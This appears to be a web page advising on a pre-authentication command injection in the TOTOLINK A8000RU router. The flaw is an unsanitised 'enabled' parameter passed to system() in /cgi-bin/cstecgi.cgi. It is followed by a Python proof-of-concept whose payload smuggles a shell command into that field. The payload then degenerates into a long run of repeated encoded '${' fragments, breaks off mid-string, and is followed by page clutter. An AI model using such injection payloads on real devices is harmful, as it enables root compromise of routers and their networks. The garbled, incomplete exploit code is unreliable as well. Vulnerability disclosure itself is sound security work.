TOTOLINK A8000RU Pre-Auth Command Injection Vulnerability

# Vulnerability Overview - **Vulnerability ID**: #801142 - **Vulnerability Title**: Totolink A8000RU 7.1cu.643_b20200521 Command Injection - **Vulnerability Description**: A pre-authentication operating system command injection vulnerability exists in the "setSyslogCfg" function of the web management interface (/cgi-bin/cstecgi.cgi) of the TOTOLINK A8000RU 7.1cu.643_b20200521 router. The CGI handler uses user-controlled input from the HTTP parameter "enabled", embeds it into a shell command string, and executes it via `system()` without any sanitization or escaping. As a result, a remote attacker can inject arbitrary shell commands through the web interface over the network and execute them with root privileges on the device without authentication. This allows full compromise of the router and may further compromise the connected local area network. # Impact Scope - **Affected Devices**: TOTOLINK A8000RU 7.1cu.643_b20200521 routers # Remediation - **Remediation Status**: Fixed (Moderation: Fixed) - **Remediation Time**: September 26, 2020 10:08 PM # POC Code ```python import requests import sys def exploit(url): # Construct payload payload = "enabled=;echo%20%27%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%

Goal Reached Thanks to every supporter — we hit 100%!

TOTOLINK A8000RU Pre-Auth Command Injection Vulnerability

More from this source